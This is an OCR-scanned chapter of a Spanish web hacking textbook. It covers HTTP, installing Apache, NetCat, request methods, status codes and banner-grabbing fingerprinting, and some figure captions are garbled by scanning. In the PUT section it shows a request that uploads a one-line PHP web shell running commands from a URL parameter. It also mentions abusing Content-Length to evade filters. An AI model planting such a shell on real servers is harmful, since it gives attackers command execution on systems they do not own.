4 Realice una transferencia de zonas (AXFR) utilizando Dig y Nslookup. 


5  Averigúe la versión de BIND y el nombre del host consultando la clase CH. 


rs PROFESOR EN LÍNEA 


Si tiene alguna consulta técnica relacionada con el contenido, puede contactarse 
con nuestros expertos: profesorOredusers.com 
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Protocolo HTTP 


El protocolo HTTP es utilizado cada vez que ingresamos 


a un sitio y navegamos a través de sus páginas. En este 
capítulo conoceremos todo lo que hay que saber sobre su 
funcionamiento, instalando nuestro propio servidor HTTP. 
También analizaremos los métodos de petición y códigos de 
estado mediante la herramienta NetCat, con el fin de obtener 


información útil y, si es posible, apoderarnos del servidor web. 


2S 


v Introducción a HTTP............... 84 v HTTP Fingerprinting ............. 108 

v Métodos de petición................ 92 LA AA 113 

v Códigos de estado HTTP....... 104 o AR 114 
AAN 
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Introducción a HTTP 


Quizá alguna vez hayamos escuchado hablar de la palabra 
hipertexto o hypertext, un término que designa a los textos 
que enlazan a otros textos. Un ejemplo son los hipervínculos que 
encontramos en todos los sitios web que, al seleccionarlos, nos 
conducen a otro documento, imagen o sitio relacionado. 

La World Wide Web es un sistema de información desarrollado 
entre 1989 y 1990 por Tim Berners-Lee, basado en hipertexto o 
contenidos enlazados y accesibles a través de internet. 

El protocolo HTTP (HyperText Transfer Protocol), como indica su 
nombre, es un protocolo de transferencia de hipertexto. Lo usamos 
cada vez que navegamos en internet y nos movemos entre página 
y página a través de sus hipervínculos. Funciona sobre el protocolo 
TCP/IP (orientado a conexión) y utiliza el esquema petición-respuesta 
entre cliente y servidor. 


Figura 1. La web está basada en hipertexto. Páginas web, documentos, 
y demás, incluyen hipervínculos que enlazan a otros contenidos. 


Antes de dedicarnos de lleno al análisis de este protocolo, sería 
bueno contar con un servidor HTTP propio. De este modo, podremos 
realizar las prácticas de todo lo que aprendamos más adelante. En la 
siguiente sección instalaremos el servidor HTTP Apache. 
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Instalación de Apache 


Apache es un servidor HTTP de código abierto que funciona en la 
mayoría de las plataformas (Windows, Linux, Macintosh, etcétera), y 
obtiene soporte de parte de la Apache Software Foundation. 

El sitio oficial del software es www.apache.org y, para descargar la 
última versión estable, debemos ingresar a http://httpd.apache.org/ 
download.cgi. Según nuestra preferencia podremos obtener el 
instalador para Windows o el source para los sistemas Unix. 


WN Denricad - Tie Aguacha HITO hera Pa. | 


mm ) 


Apache 
HTTP SERVER PROJECT 


Figura 2. Apache es un servidor HTTP disponible 
para la mayoría de las plataformas. 


En este caso, instalaremos Apache en Ubuntu Server. Los pasos 
a seguir son muy sencillos: desde la terminal, descargamos el 
source para luego compilarlo e instalarlo. Una vez descomprimido 
el código, nos movemos a la carpeta de Apache y procedemos a 
ejecutar el script de configuración: ./configure --prefix=/usr/local/ 
apache (de este modo especificamos la ruta donde se instalará el 
servidor HTTP). Luego, para compilar, debemos ejecutar make y, 
finalmente, instalamos con el comando make install. 

Para comprobar que todo funciona correctamente podemos ejecutar 
el comando /usr/local/apache/bin/apachectl start o ingresar desde el 
navegador web a la dirección IP de nuestro servidor HTTP (veremos 
algo similar a lo que muestra la Figura 3). 
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http //197 1681 111/ + 


e 192.168.1.111 


It works! 


This 5 the default web page for this server 


The web server software is running but no content has been added, vet 


Figura 3. Si ingresamos desde el navegador a la dirección IP 
de nuestro servidor HTTP, podremos saber si funciona correctamente. 


También podemos instalar Apache 
desde los repositorios de Ubuntu, tan solo 
ejecutando el comando sudo apt-get install 
apache2. Como sabemos, se instalará con las 
configuraciones por defecto. 


Apache Figura 4. Apache Software Foundation 
so 


FTWARE FOUNDATION es la organización que da soporte 
a este servidor HTTP. 


DN DOCUMENTACIÓN OFICIAL DE APACHE 


En la web oficial (http: //httpd.apache.org/docs) encontramos documentación sumamente interesante 


acerca de Apache. El material está bien organizado y para cada versión del software que existe hay una 
correspondiente zona de documentación relacionada. Podemos encontrar tutoriales, guías de usuario, 
manuales y notas sobre todo lo relacionado a este servidor HTTP. 
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Selección de módulos 

Un arquitecto diseña el plano de una construcción teniendo 
en cuenta su finalidad. Por ejemplo, si será un hospital añadirá 
las habitaciones que sean necesarias, laboratorios, etcétera. Lo 
mismo sucede con una instalación de Apache, ya que existen 
muchas funcionalidades que podemos añadirle, según el objetivo 
que persigamos. Los módulos de Apache son agrupaciones de 
funcionalidades que podemos añadir a la instalación y actualmente 
existen 540 (podemos ver la lista en: http://modules.apache.org). 


Pero, así como no todas las construcciones necesitan de un laboratorio, 


tampoco todas las instalaciones de Apache necesitan, por ejemplo, el 


módulo sendmail o SSL. Si hubiera un solo paquete con todo incluido, 


se obtendría una instalación que consumiría muchísimo espacio en el 
disco, con funciones que quedarían sin utilizar. 


El paquete de Apache, entonces, solo instala lo necesario. Es posible 
añadir los módulos que vamos a usar durante el proceso de instalación 
o después, sin necesidad de recompilar el código (podemos utilizar la 


herramienta APXS, APache eXtenSion). 

Existen módulos de seguridad interesantes. En el capítulo 10 
aprenderemos a proteger el interior de nuestro servidor y tendremos 
la oportunidad de instalar mod_security. 


modules.apache.org 


1] 


A ooo 
e a Loy on 


Welcome to modules apache org! 
Tha ute provides nformaton about the effors of web pioneers taking atvantage of he powerks module API provided dy the Apache web wrver 


The mscurces m this database offer inka to a broad assortment ol contibutes works trom developers armnd he globe We oler a place lo register and 


search for modules and assorted patches hat peope have found usefu lor Apache but have not been oficia nchuded as part of he standard Apache 
astnbution If you nave some work hal you would We to share wih the community, pisase register that inormaton wih is database 
For the sake of conveniente the old moduiés apache org ute ia vil avallable but has beer relocated lo Modurs apache Or achweo 


Most popular modules right now 


mod _pagesperd For 22 24 Apache Liceme 2 0 20130131 1432 03 *Populart 


Rerwrtes pimiic 11 images Minami ay 10 mprowe later y ana Dandaldth 


mod pory Ho teipase yet Apache Liceme 2 0 2013-0131 145835 £HPopulert 
Desolays a inencty pony Or not Depending 


mod_ayta_gacs For:20 22.24 Other Lcense 2013-03-02 0727.23 kkPopular! 
Authenticabon ajthoruation and single son-on 


mod proxy _msrpe Ho reiease yet Apache Liceme 2 0 2013-04-25 145304 KPopular! 
Apache module tor Oubook Anywhere passihrough support in reverse proxy setups 


Figura 5. La página http://modules.apache.org facilita 
la búsqueda de módulos para la instalación de Apache. 
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Herramientas útiles 


En la primera parte de este capítulo explicamos que el protocolo 
HTTP usa el esquema de petición-respuesta. Las conexiones entre 
cliente y servidor se establecen mediante cabeceras o headers que 
especifican determinadas cosas. 

En las cabeceras de petición se indica, por ejemplo, qué tipo 
de lenguaje y codificación acepta el navegador web, mientras que 
en las cabeceras de respuesta se pueden ver datos del servidor, 
entre otras cuestiones. 

Sería útil una herramienta que mostrara las cabeceras que envía 
nuestro navegador web y las respuestas que recibe. También tendría 
utilidad un programa que realice conexiones sobre TCP/IP de modo 
que no sea necesario capturar la conexión para luego modificarla. 

Tales herramientas existen. A continuación, conoceremos dos que 
realizan estas tareas. Cabe destacar que no son las únicas herramientas 
útiles en este campo ya que las demás actúan de forma similar, por 
ende, si aprendemos a utilizar una de ellas, será fácil comprender el 
funcionamiento de las otras. 


Live HTTP headers 


Live HTTP headers es un complemento para Firefox que permite 
capturar todo el tráfico del protocolo HTTP y mostrarlo en una ventana. 
A partir de ahí podemos editar las cabeceras y reenviarlas con el 
contenido modificado. 

Podemos obtener esta herramienta buscando su nombre en 
el sitio web de add-ons para Firefox. Una vez instalada, accedemos 
a ella desde el menú de herramientas y nos mostrará una ventana 
que capturará todo el tráfico HTTP que generemos a partir de 
ese momento. 


O HERRAMIENTAS ÚTILES 


Live HTTP headers y NetCat no son las únicas herramientas que sirven para trabajar sobre el protocolo 
HTTP. Tamper Data es otro add-on para Firefox, muy bueno, que permite capturar las cabeceras HTTP 
y modificarlas. Cryptcat funciona como NetCat, pero cifrando el tráfico. 
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Figura 6. Live HTTP headers es un add-on, o complemento 
para Firefox, que nos permite modificar las cabeceras y reenviarlas. 


Aún no explicamos en detalle el contenido de estas cabeceras, así 


que es lógico que nos preguntemos para qué capturarlas y modificarlas. 


A continuación, entenderemos los peligros que envuelve este 


protocolo, que afectan sobre todo a un servidor HTTP mal configurado. 


NetCat 

NetCat es una herramienta de red con muchísimas utilidades, por 
lo que se la conoce también como la "navaja suiza” de los hackers. En 
nuestro caso, solo nos interesa para poder realizar conexiones sobre 
TCP/IP a un servidor HTTP. Podemos descargarla desde la siguiente 
dirección: http://netcat.sourceforge.net/download.php, donde 
encontraremos todas sus versiones. 

Accedemos a NetCat desde la terminal de nuestro sistema operativo. 


Para tener una idea de los parámetros existentes, podemos ejecutar nc —h. 


El parámetro -—v sirve para ver más información. Si no nos alcanza, 
puede agregarse otra v más. Para realizar una simple conexión a un 
servidor HTTP el comando sería: nc -vv www.sitioweb.com 80, que nos 
abre una comunicación con sitioweb.com y permite hacer peticiones 
con los headers definidos por nosotros mismos. Básicamente, lo que 
queremos es dialogar con el servidor. 
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EN Administrador: Símbolo del sistema ola| 


CiWserssxsheyrDocuments >ne YU UY. .com 80 
Warning: inverse host lookup failed for 98. 227. ¿ h_errno 110404: NO_DATA 


com 198. 229 86 Chttp> open 
HTTP/1.1 


t/htnl1; charset-UTF-8 
2011 04:37:63 GMI 
3 http://www. «Con 
r-Encoding: chunked 
Connection: Keep-Alive 
Set-Cookie: X-Mapping-1nmnkdnk-=458E3B4DD436106628449CD3'74C08757; path”, 


sent 36, rcud 289: NOTSOCK 


CiUsersrsheyrDocuments > 


Figura 7. NetCat, también conocido como navaja suiza, 
es una excelente herramienta de red, 


Diálogo con el servidor HTTP 


Ya que HTTP funciona sobre TCP/IP, es necesario establecer una 
conexión con el servidor a fin de enviar y recibir datos. En caso de 
que ésta finalice y necesite transferir aún más datos, se vuelve a 
iniciar otra comunicación. 

Como dijimos, nosotros queremos conversar un rato con el servidor 
HTTP, y para eso establecimos una comunicación mediante NetCat. En 
primer lugar abrimos la conexión nc —vv www.sitioweb.com 80. Una vez 
confirmado que el puerto está abierto, procedemos a definir las cabeceras. 

El método de petición, junto con sus respectivos parámetros, es lo 
primero que debemos definir. De ese modo, le indicamos al servidor 
HTTP qué es lo que tiene que hacer. 


WebDAYV es una extensión para el protocolo HTTP desarrollada por un grupo de trabajadores del IETF. El 


objetivo fue añadir funcionalidades sobre los archivos de un servidor HTTP: copiar, mover, bloquear, etcé- 
tera. Los métodos que agrega son: PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK y UNLOCK. 
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Podemos seguir por la cabecera host, que define justamente a dónde 
se enviará nuestra petición. Existen muchas más cabeceras, pero no 
todas son necesarias. Esta vez, haremos un diálogo sencillo. 


x rootobt; — 


erminal Help 


Figura 8. Con la ayuda de NetCat realizamos un diálogo sencillo 
con el servidor HTTP de un sitio web. 


En el diálogo que podemos ver en la Figura 8, solicitamos la página 
principal de un sitio web. A continuación, identificamos la petición y la 
respuesta: 


Petición: 


GET /index.html HTTP/1.1 
Host: sitioweb.com 


Respuesta: 


HTTP/1.1 200 OK 
Date: Wed, 22 Jun 2011 21:50:11 GMT 
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Server: Apache 
Transfer-Encoding: chunked 
Content-Type: text/html 


<html> Todo el código HTML de la página solicitada </html> 


La cuestión es: ¿de qué le sirve a un hacker dialogar con un servidor 
HTTP? La respuesta es: le sirve de mucho. Con la simple lectura de las 
cabeceras de respuesta se puede obtener información útil e, incluso, poner 
en peligro todo el servidor web si existen configuraciones inadecuadas. 


Métodos de petición 


El protocolo HTTP fue desarrollándose durante la década del 90. 
Comenzó tolerando un sólo método, el GET, en su versión HTTP/0.9 
(la cual al día de hoy, debido a su sencillez, es obsoleta, ya que ni siquiera 
era posible trabajar con cabeceras). Luego, en 1996, se presentó la versión 
HTTP/1.0 con más métodos de petición: GET, POST y HEAD. También 
se añadió el soporte para las cabeceras HTTP. Finalmente, en 1999 llegó la 
versión HTTP/1.1, que actualmente utilizan la mayoría de los servidores, 
y se agregaron más métodos de petición a los tres anteriormente 
nombrados (algunos son OPTIONS, PUT y TRACE). 

Una vez que establecemos la conexión, el método es lo primero 
que debemos especificar. No existen muchos; analizaremos seis de 
ellos realizando consultas y obteniendo información útil mediante sus 
respuestas. Aprenderemos a usar algunos como vectores de ataque 
hacia el servidor web. 


OPTIONS 


El método OPTIONS fue incluido en la versión HTTP/1.1. No es 
obligatorio implementarlo, lo que significa que no siempre estará 
habilitado. De hecho, se recomienda deshabilitar, siempre, todo lo 
que no sea necesario. 


»  Www.redusers.com www.detodoprogramacion.com 


WEB HACKING 


Este método realiza una petición de 
información a un recurso específico del servidor, 
sobre las diferentes opciones de comunicación 
habilitadas. La consulta está conformada por el 
método, el recurso y la versión del protocolo: 
OPTIONS /index.html HTTP/1.1. En caso de que la 
petición no sea dirigida a un recurso específico, 
se reemplaza por un asterisco: OPTIONS * 
HTTP/1.1; esto equivale a un PING que va dirigido 
al servidor en general y nos sirve para saber si se 
encuentra en funcionamiento. 
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Figura 9. Si en lugar de especificar un recurso usamos 
un asterisco (*), funcionará como un PING al servidor. 


En la Figura 10 solicitamos los métodos permitidos a un servidor 
y, dado que OPTIONS estaba habilitado, nos respondió lo que 
queríamos saber en la cabecera Allow. Allí podemos ver que las 
opciones de comunicación que están permitidas en ese servidor son: 


OPTIONS, TRACE, GET, HEAD y POST. 


Podría decirse que esta información le ahorra bastante tiempo 


a un atacante, ya que es más rápido averiguar, de una sola vez, 


todas las opciones de comunicación que están permitidas, que estar 


intentando manualmente método por método. 
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Figura 10. El método OPTIONS consulta las opciones 
de comunicación permitidas en un servidor. 


GET 


En su primera versión (HTTP/0.9) el protocolo contaba con 
tan solo un método, el GET, que era y es obligatorio implementar 
en todos los servidores. Se encarga de realizar la petición de todas 
las páginas o recursos que queremos visualizar y, podemos decir, 
es el método HTTP más utilizado. 

En la versión actual del protocolo (HTTP/1.1), GET sigue cumpliendo 
la misma función. Sin embargo, el soporte para las cabeceras permite 
definir más cosas haciendo que la petición sea más compleja. 

Capturamos, con la herramienta Live HTTP headers, una petición 
GET realizada al sitio web de RedUsers, donde encontramos las 
siguientes cabeceras: 


MODIFICAR ELUSER-AGENT 


User Agent Switcher es un add-on para Firefox que sirve para cambiar el agente de usuario que ten- 


gamos por cualquier otro. Ya sea predefinido en la herramienta (como iPhone 3.0, Internet Explorer, los 


robots de búsqueda de Google, Yahoo y MSN) u otro agregado manualmente por nosotros. 
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GET /HTTP/A1.1 


Host: www.redusers.com 

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0 
Accept: text/html, application/xhtml+xml,application/íxml;q=0.9,*/*;q=0.8 
Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3 

Accept-Encoding: gzip, deflate 

Accept-Charset: 150-8859-1,utf-8;q=0.7,*;q=0.7 

Connection: keep-alive 


Vemos una cabecera nueva: User-Agent, que envía algunos datos 
sobre nosotros al servidor. Entre esos datos se encuentra nuestro 
navegador (con su correspondiente versión) y el sistema operativo que 
estamos usando. Lo interesante es que fácilmente podemos falsificar 
esta información, por ejemplo, modificándola de tal modo que para el 
servidor estemos usando el navegador Opera en Ubuntu 12.4. 


Figura 11. Gracias a las cabeceras HTTP podemos 
hacer una consulta más compleja. 


Seguimos con la cabecera Accept. Su nombre nos da una idea de lo 
que indica: se trata del tipo de contenido que acepta el cliente, es decir, 
nosotros. El formato es: tipo/subtipo. 
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Text/HTML indica que aceptamos texto HTML, text/plain texto plano, 
image/jpg imágenes en formato .jpg. También podemos usar asteriscos 
(*). Por ejemplo, image/* indica que aceptamos imágenes en todo tipo 
de formato y */* significa que aceptamos todo tipo de contenidos. 

Si leemos detenidamente la petición citada antes, podemos notar 
en varias cabeceras indicaciones similares a q=0.3, que especifican 
prioridades. Por ejemplo, la línea image/jpg; q=1, image/png; q=0.9, image/*; 
q=0.8 indica que preferimos las imágenes en formato .jpg (ya que tiene 
el valor más alto: q=1), luego .png y por último cualquier otro formato. 

Luego, tenemos tres cabeceras más que indican tipos de 
aceptaciones: Accept-Language, Accept-Encoding y Accept-Charset. La 
primera indica el idioma que aceptamos (el servidor debe disponer 
de tales traducciones y podemos especificar con prioridades más de 
un idioma con su respectivo subtipo, por ejemplo: es-ar, es;q=0.8, en-us; 
q=0.5). Accept-Encondig indica los tipos de codificación que entiende 
nuestro cliente y también pueden especificarse prioridades. Por 
último, Accept-Charset indica las tablas de caracteres que aceptamos 
(por ejemplo, Unicode, utf-8, etcétera). 

Finalmente, vemos en nuestra petición la cabecera Connection, que 
simplemente indica el estado de la conexión. En caso de que diga keep- 
alive, continúa abierta para futuras peticiones; de lo contrario dirá close. 


* rootobt: — 


Figura 12. Las cabeceras Accept de contenidos, lenguajes, 
caracteres y codificaciones permiten especificar prioridades. 
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Una vez definidas todas las cabeceras que queremos añadir a 
nuestra petición, ésta se envía al servidor, que responde con otra serie 
de cabeceras y muestra el contenido que solicitamos. Por ejemplo, si la 
petición fue dirigida a la página principal de un sitio, encontraremos 
todo su código HTML a continuación de la última cabecera que 
hayamos recibido en la respuesta. 
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Figura 13. El método GET solicita los recursos que queremos 
ver y, en caso de tratarse de una página web, nos mostrará 
su código HTML al final de la respuesta. 


Es cierto que GET es un método que usamos todos los usuarios 
de internet cada vez que navegamos entre sitios web y solicitamos los 
recursos que necesitamos ver. Pero lo interesante para un hacker está en 
las cabeceras HTTP. Es bueno saber cuáles son y qué define cada una 
de ellas, de modo que podamos jugar y experimentar con sus valores tal 
como hicimos con el User-Agent al hacernos pasar por otro cliente. Sin 
embargo, existen otros métodos que pueden ser de mayor utilidad. 


POST 


Después de GET, llegaron con la versión HTTP/1.0 dos métodos 
más. Uno de ellos es POST, que solicita el envío de datos del cliente 
al servidor (contrariamente a GET que, como sabemos, solicita la 
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recepción de datos). Utilizamos el método POST, por ejemplo, al enviar 
un mensaje en un foro, identificándonos mediante nuestro usuario y 
contraseña en un sitio web o cuando hacemos uso de un uploader 
para subir imágenes o cualquier otro contenido. 

El método POST requiere definir una cabecera que aún no hemos 
visto, Content-Length, que indica la cantidad de caracteres que posee 
el contenido que vamos a enviarle al servidor. Como ejemplo, vamos a 
tratar con un formulario de suscripción que nos pide nuestro nombre, 
empresa y correo electrónico. El contenido a enviar es: nombre=Sheilaé: 
empresa=Hackersenlawebé€email=shey.x7%40gmail.com, lo que equivale a 62 
caracteres, por lo cual el Content-Length tendrá el valor de 62. Armamos 
la consulta de la siguiente manera: 


POST /suscripcion.php HTTP/1.1 
Host: www.sitiowebasuscribirnos.com 
Content-Length: 62 


nombre=Sheilas8empresa=Hackersenlawebg$email=shey.x7%40gmail.com 


En la Figura 14 podemos ver cómo enviamos la consulta al 
servidor, especificando el método POST, el recurso, el Content-Length 
y, por supuesto, los datos que nos pide el formulario de suscripción. 

Con una agradable sensación de éxito visualizamos la respuesta 
del servidor, agradeciéndonos por habernos suscripto. 

La cabecera Content-Length resulta interesante para el hacker, 
porque el servidor al cual se envía la consulta tendrá en cuenta solo 
el contenido que esté dentro de la cantidad de caracteres indicada. 
Por ejemplo, si le asignamos a Content-Length un valor 


Ny MÉTODO HTTP CONNECT 


El método CONNECT se añadió en la versión HTTP/1.1 del protocolo. No es muy común verlo habilita- 
do, pero se usa en proxys que pueden funcionar como túnel SSL. Podemos encontrar algo de información 
en los RFC propios del protocolo (RFC 2616) y, por supuesto, en documentos de internet. 
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de 82 caracteres y el contenido que le enviamos posee 350, 
el servidor tendrá en cuenta sólo los primeros 82 caracteres 
del contenido e ignorará el resto. 
Con un poco de imaginación podemos jugar con esta cabecera y 
evadir filtros o sistemas de seguridad para poder vulnerar un sitio. 
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Figura 14. El método POST solicita el envío de datos del cliente 
al servidor, al contrario de GET que solicita la recepción de datos. 


HEAD 


El otro método de la versión HTTP/1.0 es HEAD, que solicita los 
headers del servidor. La única diferencia con GET es que no muestra 
todo el código HTML de la página; por ejemplo, si realizamos una 
petición a /index.html, responderá solo con las cabeceras. 

La consulta que vamos a realizar es muy simple. Debemos 
especificar el método (que, por supuesto, es HEAD), luego el recurso, 
la versión del protocolo y, debajo, el host al cual va dirigida la petición. 


Petición: 


HEAD /index.html HTTP/1.1 
Host: www.sitioweb.com.ar 
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Respuesta: 


HTTP/1.1 200 OK 


Server: Apache/2.2 

Content-Type: text/html; charset=UTF-8 

Date: Wed, 29 Jun 2011 04:39:05 GMT 
Connection: Keep-Alive 

Last-Modified: Wed, 28 Jun 2011 01:23:58 GMT 


Figura 15. El método HEAD muestra las cabeceras del recurso 
que consultemos; tales datos pueden servir para un ataque posterior. 


Analicemos la respuesta del servidor: 


e Server: es una cabecera realmente interesante para realizar un 
ataque, ya que muestra información sobre el software que utiliza 
el servidor. 

e Content-Type: combina los headers Accept y Accept-Charset (por eso 
vemos en primer lugar text/html y luego, tras el punto y coma, 
charset=UTF-8). 

e Date: indica fecha y hora en que se generó la respuesta del servidor. 
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e Connection: mencionado anteriormente, en este caso mantiene 
la conexión abierta (Keep-Alive). 

e Last-Modified: dice cuándo fue la fecha y hora en que el recurso 
solicitado fue modificado por última vez. 


Estos son datos que un hacker tendrá presentes a la hora de realizar 
un ataque al servidor, sobre todo la cabecera Server, acerca de la cual 
hablaremos un poco más en las próximas secciones del capítulo. 


TRACE 


Al igual que un espejo o reflejo, el método TRACE (incorporado 
en la versión HTTP/1.1) responde lo mismo que recibe. Con esto 
podemos saber cómo le llega la petición al servidor y realizar pruebas 
para obtener su diagnóstico. Después del método, en la consulta debe 
especificarse lo que se va enviar, por ejemplo: 


Petición: 


TRACE /hola HTTP/1.1 
Host: www.sitiocontrace.com 


Respuesta: 


TRACE /hola HTTP/1.1 
Host: www.sitiocontrace.com 


D CABECERAS HTTP 


Existen aún más cabeceras de las nombradas en este capítulo. Algunas son: Accept-Ranges, 
Age, Authorization, Cache-Control, Content-Range, ETag, If-Match, If-Modified-Since, Max- 
Forwards y Referer. Para conocer más al respecto se puede consultar el RFC 2616, perteneciente 


a este protocolo. 
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No, no nos hemos equivocado, la consulta y la respuesta son lo mismo. 
Tal como dijimos, el método TRACE funciona como un reflejo (Figura 16). 


x rootiibt: 


Figura 16. El método TRACE funciona como un espejo 
o reflejo, respondiéndonos lo mismo que enviamos. 


PUT 


Llegamos al método PUT, uno de los más interesantes, ya que si 
está habilitado se podría llegar a obtener muy fácilmente el control 
del servidor. Lo que hace este método es subir/sobrescribir un 
determinado archivo con el contenido que especifiquemos en la misma 
petición. El funcionamiento es simple: se realiza la petición al recurso 
especificado, si éste existe se sobrescribirá el contenido por el que 
nosotros queramos o, en caso de que no exista, se creará uno nuevo. 

Quizá nos preguntemos... ¿cómo un atacante tomaría control del 
servidor con este método?¿No sería más interesante borrar archivos 
o descargar información confidencial? La respuesta está en el tipo de 
contenido que se puede subir con este método. Por ejemplo, un simple 
código en lenguaje PHP que nos permita ejecutar comandos en el 
servidor sería una excelente idea, desde el punto de vista del atacante. 

Por otra parte, debemos saber que PUT requiere, al igual que POST, 
especificar el Content-Length de lo que se va a subir. Un ejemplo de 
petición sería el siguiente: 
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PUT /siloabreexplota.php HTTP/1.1 
Host: sitiowebconput.com 
Content-Length: 33 


<?php system($ _GETI'comando”1);?> 


Esta petición sobrescribirá o creará (según 


corresponda) un archivo llamado siloabreexplota. CON EL METODO 
php, que contiene un código en el lenguaje PHP PUT ES MÁS 
(<?php system($_GET['comando”]);?>) con la función , 

system, que sirve para ejecutar comandos en el FACIL OBTENER 
servidor. Hoy no es común encontrar servidores EL CONTROL DEL 
con este método activado debido a lo peligroso 

que puede llegar a ser, pero en versiones viejas SERVIDOR 


de algunos servidores viene habilitado por defecto. 
En caso de que encontremos alguno de ellos y e 
tenemos que saber que puede llegar a pedirnos autenticación al usarlo 
y que el directorio o archivo puede tener permisos de solo lectura, de 
modo que no podamos subir el archivo de forma tan fácil. 
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Figura 17. El método PUT permite subir o sobrescribir 
un determinado archivo del servidor con el contenido que queramos. 


www.detodoprogramacion.com www.redusers.com <« 


104 PEA 3. PROTOCOLO HTTP 


Códigos de estado HTTP 


Seguramente hemos visto que cuando el servidor HTTP responde a 
nuestra petición, en primer lugar nos devuelve un código junto a una 
breve descripción. Estos códigos indican el estado en que se encuentra 
nuestra consulta. Por ejemplo, si fue realizada correctamente o no, si 
fue rechazada, bloqueada o redireccionada, si solicitamos un recurso 
inexistente o que ha sido movido a otro lugar, etcétera. 

En esta sección del capítulo conoceremos los códigos de estado 
HTTP que vemos con más frecuencia, organizados por los siguientes 
criterios: peticiones correctas, redirecciones, errores del cliente y 
errores del servidor. Es importante conocerlos ya que, en caso de que 
la petición no haya podido llevarse a cabo, podremos saber con más 
exactitud el motivo por el cual no se pudo realizar. 


Peticiones correctas 


Hablando de peticiones que se realizan con éxito, el código que más 
vemos es el 200 OK, que nos informa que todo salió bien. En casi todos 
los métodos, cuando la petición es realizada correctamente se devuelve 
un 200 OK (por ejemplo, al usar GET y solicitar una página que se 
encuentra disponible, al enviar información al servidor mediante POST 
y que llegue bien, o si solicitamos los headers de un recurso y podemos 
verlos correctamente). 

Si usamos el método PUT y creamos un nuevo archivo en el 
servidor, en caso de que resulte con éxito se nos informa con el código 
201 Created. También ocurre con POST cuando se crea un nuevo recurso 
como consecuencia de la información que hayamos enviado. 


METODO HTTP DELETE 


El método DELETE, añadido en la versión HTTP/1.1 del protocolo, tal como su nombre lo indica 
permite borrar o eliminar archivos del servidor. Por supuesto, no será fácil encontrarlo habilitado 
y, si tenemos la suerte de que esté permitido en algún servidor, es probable que nos pida autori- 


zación para usarlo. 
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Figura 18. Recibimos el código 200 OK siempre 
que nuestra petición se haya realizado correctamente. 


Existen otros códigos que se utilizan en las peticiones correctas, 
pero quizás no sean tan comunes como los dos que mencionamos 
anteriormente. Por ejemplo, la respuesta 204 No content, que recibimos 
cuando la petición fue exitosa pero no necesitamos que se nos envíe 
ninguna otra información. 


Redirecciones 


Las redirecciones ocurren de forma transparente para el usuario 
si se está usando un navegador web. Cuando solicitamos un recurso 
que ha sido movido, el servidor nos responde con el código de estado, 
que nos informa de la situación y de la nueva locación del recurso. De 
modo que nuestra consulta se redirecciona a esa nueva ubicación y 
nosotros nunca nos enteramos de lo que ocurrió. 

Si realizamos la petición desde NetCat, podemos conocer cuáles 
son esos códigos que responde el servidor en caso de que el recurso 
solicitado haya cambiado de ubicación. 

Un código que podemos encontrar con bastante frecuencia es 
301 Moved Permanently, que indica que el recurso solicitado ha sido 


movido permanentemente de esa dirección y brinda además la nueva 


ubicación del archivo. 
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Figura 19. El código 301 Moved Permanent] y 
avisa que el recurso solicitado ya no se encuentra en esa ubicación. 


Otro código de redirección bastante común es el 302 Moved 
Temporarily, muy similar al 301, pero con el cual la nueva ubicación del 
recurso debe tomarse como un reemplazo temporal. Existen aún más 
respuestas que informan sobre redirecciones, y su código siempre 
empieza con el número 3. 


Errores del cliente 


Son códigos que visualizamos con bastante frecuencia en nuestro 
navegador web, ya que indican que somos 
nosotros (los clientes) quienes nos hemos 


LOS CODIGOS DE equivocado. Aquí entra en acción el famoso 

ESTADO HTTP NOS error 404 Not Found, que informa que el recurso 
solicitado no se encuentra. 

INFORMAN TODO Otro error conocido es el 403 Forbidden, 

SOBRE NUESTRA que vemos cuando ingresamos donde no 


corresponde (accidentalmente o no), e indica 
CONSULTA que no podemos visualizar el contenido porque 
carecemos de los permisos necesarios. Por otra 


parte, 400 Bad Request informa que tenemos un 
error de sintaxis en la petición. 
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Figura 20. 404 Not Found informa que el recurso no se encuentra. 


Como vimos al comienzo de la sección anterior, el método OPTIONS 
muestra las opciones de comunicación habilitadas en el servidor. Pero, 
si OPTIONS no estuviera disponible, tendríamos que intentar método 
por método. Cuando realizamos la petición a uno que no está 


habilitado, se nos informa con el código de error 405 Method Not Allowed. 
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Figura 21. El código 405 Method Not Allowed 
indica que el método no está permitido en el servidor. 
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Errores del servidor 


Por último, conoceremos los errores que pueden ocurrir en el 
servidor. Uno de ellos es el 500 Internal Server Error, que podemos ver 
cuando se produce algún error en el interior del servidor y éste no 
puede procesar nuestra petición. 

También existe el código 505 HTTP Version Not Supported que, como 
su nombre indica, informa que la versión HTTP que estamos utilizando 
para realizar la petición no es soportada por el servidor. 


HTTP Fingerprinting 


Un hacker tiene sobradas razones para saber qué software está 
ejecutándose sobre su objetivo. Una de ellas es que cada versión y 
módulo de los servidores web tiene sus respectivos fallos de seguridad. 

Por lo tanto, si quiere aprovecharse de ellos, lógicamente debe conocer 
con la mayor exactitud posible frente a qué se encuentra. De eso se tratan 
las técnicas HTTP Fingerprinting, que sirven para identificar mediante el 
protocolo HTTP el software que ejecuta un determinado servidor. 


Banner Grabbing 


Una técnica de HTTP Fingerprinting muy simple es la de Banner 
Grabbing. El banner es la información que nos envía un servicio al 
interactuar con él. 

En el caso de los servidores HTTP, el banner es el que podemos 
visualizar en la cabecera Server. Para obtenerlo debemos realizar una 
consulta al servidor usando el método HEAD que, como sabemos, 
devuelve las cabeceras HTTP de un recurso. 


D CÓDIGOS DE ESTADO HTTP 


En la sección de códigos de estado HTTP de este capítulo, tratamos solo las respuestas que vemos con 
más frecuencia. Si nos interesa, podemos buscar el Request For Comment 2616, que pertenece al 
protocolo HTTP, donde están descritos todos los códigos de estado existentes. 
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Figura 22. Banner Grabbing es una técnica 
de HTTP Fingerprinting. La cabecera Server 
contiene la información que más nos interesa. 


En el caso de la Figura 22, la cabecera Server informa que el 
servidor está utilizando el software Apache (versión 1.3.41), con 
soporte para PHP (versión 5.2.17), bajo un sistema Unix. Tales datos 
son de gran importancia para un hacker, pero los banners no son 100% 
fiables, ya que esta información es muy fácil de modificar. Pueden 
darse, por lo tanto, dos opciones: 

1) Que el administrador haya borrado el banner de modo que no 
podamos obtener nada; 
2) Que haya reemplazado la información original por datos falsos. 

Lógicamente, la segunda opción es la más inteligente desde el 
punto de vista del administrador. A continuación -si bien no nos 
aseguraremos de que un atacante jamás descubra el software que 
